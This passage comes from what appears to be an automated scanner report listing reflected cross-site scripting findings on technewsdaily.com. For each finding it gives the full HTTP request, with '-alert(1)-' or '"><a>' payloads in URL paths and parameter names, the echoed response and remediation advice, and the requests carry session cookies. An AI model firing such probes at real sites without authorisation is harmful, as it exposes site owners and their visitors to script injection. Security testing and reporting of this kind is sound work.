HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:56 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 69273
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/?ddb0a"><a>e723fad5a8d=1/" /> ...[SNIP]...
1.53. http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/facebook-cartoon-profile-picture-trends-1757/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e230'-alert(1)-'30e4b928fec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /facebook-cartoon-profile-picture-trends-1757/?7e230'-alert(1)-'30e4b928fec=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:10 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68911
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... t type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/?7e230'-alert(1)-'30e4b928fec=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31d00'-alert(1)-'f12af6e76cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /first-chrome-os-laptop-has-no-caps-lock-key-176931d00'-alert(1)-'f12af6e76cc/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:51 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40494
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-176931d00'-alert(1)-'f12af6e76cc/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.55. http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86294'-alert(1)-'8c545027418 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /first-chrome-os-laptop-has-no-caps-lock-key-1769/?86294'-alert(1)-'8c545027418=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:40 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62720
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... pe="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/?86294'-alert(1)-'8c545027418=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.56. http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8bd8"><a>a9904dd5d15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /first-chrome-os-laptop-has-no-caps-lock-key-1769/?f8bd8"><a>a9904dd5d15=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63082
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/?f8bd8"><a>a9904dd5d15=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24ca1'-alert(1)-'bcfab85f83e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /google-1-leaked-image-shows-social-networking-176724ca1'-alert(1)-'bcfab85f83e/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... pe="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-176724ca1'-alert(1)-'bcfab85f83e/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.58. http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc93c'-alert(1)-'586628d7054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /google-1-leaked-image-shows-social-networking-1767/?cc93c'-alert(1)-'586628d7054=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62043
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... ="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/?cc93c'-alert(1)-'586628d7054=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.59. http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86b5f"><a>d8834390154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /google-1-leaked-image-shows-social-networking-1767/?86b5f"><a>d8834390154=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:44 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62405
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/?86b5f"><a>d8834390154=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e009a'-alert(1)-'7ea9f31ecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /google-launches-kids-teach-parents-tech-site-1809e009a'-alert(1)-'7ea9f31ecf/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:58 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40494
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ype="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809e009a'-alert(1)-'7ea9f31ecf/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.61. http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ab8a'-alert(1)-'583da0e5858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /google-launches-kids-teach-parents-tech-site-1809/?5ab8a'-alert(1)-'583da0e5858=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63254
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... e="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/?5ab8a'-alert(1)-'583da0e5858=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.62. http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c729d"><a>28a95d03253 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /google-launches-kids-teach-parents-tech-site-1809/?c729d"><a>28a95d03253=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63616
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/?c729d"><a>28a95d03253=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0cc5'-alert(1)-'0afd2477a2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hacker-strikes-florida-campus-1455a0cc5'-alert(1)-'0afd2477a2e/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:49 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40466
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/hacker-strikes-florida-campus-1455a0cc5'-alert(1)-'0afd2477a2e/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.64. http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/hacker-strikes-florida-campus-1455/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 397e5"><a>3f4e5fd4418 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /hacker-strikes-florida-campus-1455/?397e5"><a>3f4e5fd4418=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:23 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62801
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/?397e5"><a>3f4e5fd4418=1/" /> ...[SNIP]...
1.65. http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/hacker-strikes-florida-campus-1455/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37e1a'-alert(1)-'03372dc3979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hacker-strikes-florida-campus-1455/?37e1a'-alert(1)-'03372dc3979=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:38 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62439
